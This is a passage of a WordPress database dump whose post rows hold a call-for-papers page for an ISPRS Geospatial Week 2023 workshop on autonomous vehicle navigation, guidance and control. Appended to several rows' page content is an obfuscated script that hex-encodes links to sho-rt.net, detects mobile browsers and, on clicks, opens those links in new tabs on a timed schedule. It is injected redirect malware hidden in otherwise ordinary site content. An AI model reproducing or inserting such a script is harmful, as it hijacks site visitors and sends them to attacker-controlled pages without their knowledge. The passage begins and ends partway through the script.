Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-14 21:39:43','2022-10-14 21:39:43','',2167,'https://gsw2023.com/?p=2855',0,'revision','',0),
(2856,1,'2022-10-14 22:23:51','2022-10-14 22:23:51','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\n<h5></h5>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<table>\n<tbody>\n<tr>\n<td width=\"158\">Cairo Lúcio Nascimento Junior</td>\n<td width=\"267\">Professor, ITA, Brazil</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Tamazin</td>\n<td width=\"267\">Senior GNSS Architect, Safran Navigation and Timing</td>\n</tr>\n<tr>\n<td width=\"158\">Paul Hershey</td>\n<td width=\"267\">Principal Engineering Fellow, Raytheon, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Elhabiby</td>\n<td width=\"267\">CEO, Micro Engineering Technologies Inc.</td>\n</tr>\n<tr>\n<td width=\"158\">Caroline Channel</td>\n<td width=\"267\">Professor, ISAE-Supaero, France</td>\n</tr>\n<tr>\n<td width=\"158\">Ashraf Abosekeen</td>\n<td width=\"267\">Assistant Professor, Military Technical College, Cairo, Egypt.</td>\n</tr>\n<tr>\n<td width=\"158\">Umar Iqbal</td>\n<td width=\"267\">Associate Professor, Mississippi State University, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Amr Elwakeel</td>\n<td width=\"267\">Assistant Professor, University of Western Virginia, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Peter Travis Jardine</td>\n<td width=\"267\">Adjunct Professor, Royal Military College of Canada, ON, Canada</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','publish','closed','closed','','ngc-of-av-navigation-guidance-and-control-of-autonomous-vehicles','','','2023-03-03 17:25:40','2023-03-03 17:25:40','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2856',0,'dt_portfolio','',0),
(2857,1,'2022-10-14 22:23:37','2022-10-14 22:23:37','','m2','','inherit','open','closed','','m2-4','','','2022-10-14 22:23:37','2022-10-14 22:23:37','',2856,'https://gsw2023.com/wp-content/uploads/2022/10/m2-3.jpg',0,'attachment','image/jpeg',0),
(2858,1,'2022-10-14 22:23:51','2022-10-14 22:23:51','','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:23:51','2022-10-14 22:23:51','',2856,'https://gsw2023.com/?p=2858',0,'revision','',0),
(2860,1,'2022-10-14 22:28:22','2022-10-14 22:28:22','','m1','','inherit','open','closed','','m1-4','','','2022-10-14 22:28:22','2022-10-14 22:28:22','',2856,'https://gsw2023.com/wp-content/uploads/2022/10/m1-3.jpg',0,'attachment','image/jpeg',0),
(2861,1,'2022-10-14 22:33:33','2022-10-14 22:33:33','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align:justify; color:black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2860\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 